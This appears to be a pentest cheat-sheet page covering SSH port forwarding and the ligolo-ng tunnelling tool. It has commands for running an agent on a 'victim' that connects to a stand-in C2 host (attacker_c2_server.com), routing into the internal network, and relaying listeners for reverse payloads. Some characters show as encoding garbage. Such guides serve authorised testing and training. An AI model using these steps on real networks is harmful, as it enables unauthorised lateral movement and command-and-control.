SSH
Copy ssh -L 8080:acuity@203.0.113.50:8080 # Local portforward ligolo-ng
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
Copy ./proxy -h # Help options
./proxy -autocert # Automatically request LetsEncrypt certificates Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
Copy ./agent -connect attacker_c2_server.com:11601 If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
A session should appear on the proxy server.
Copy INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000" Use the session command to select the agent .
Copy ligolo-ng Β» session
Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux :
Copy sudo ip route add 192.168.0.0/24 dev ligolo Windows :
Copy netsh int ipv4 show interfaces
Idx MΓ©t MTU Γtat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX] Start the tunnel on the proxy
Copy [Agent : nchatelain@nworkstation] Β» start_tunnel
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation Agent Binding/Listening
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
Copy [Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent! On the proxy:
When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:
Copy [Agent : nchatelain@nworkstation] Β» listener_list
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Active listeners β
βββββ¬ββββββββββββββββββββββββββ¬βββββββββββββββββββββββββ¬βββββββββββββββββββββββββ€
β # β AGENT β AGENT LISTENER ADDRESS β PROXY REDIRECT ADDRESS β
βββββΌββββββββββββββββββββββββββΌβββββββββββββββββββββββββΌβββββββββββββββββββββββββ€
β 0 β nchatelain@nworkstation β 0.0.0.0:1234 β 127.0.0.1:4321 β
βββββ΄ββββββββββββββββββββββββββ΄βββββββββββββββββββββββββ΄βββββββββββββββββββββββββ
[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.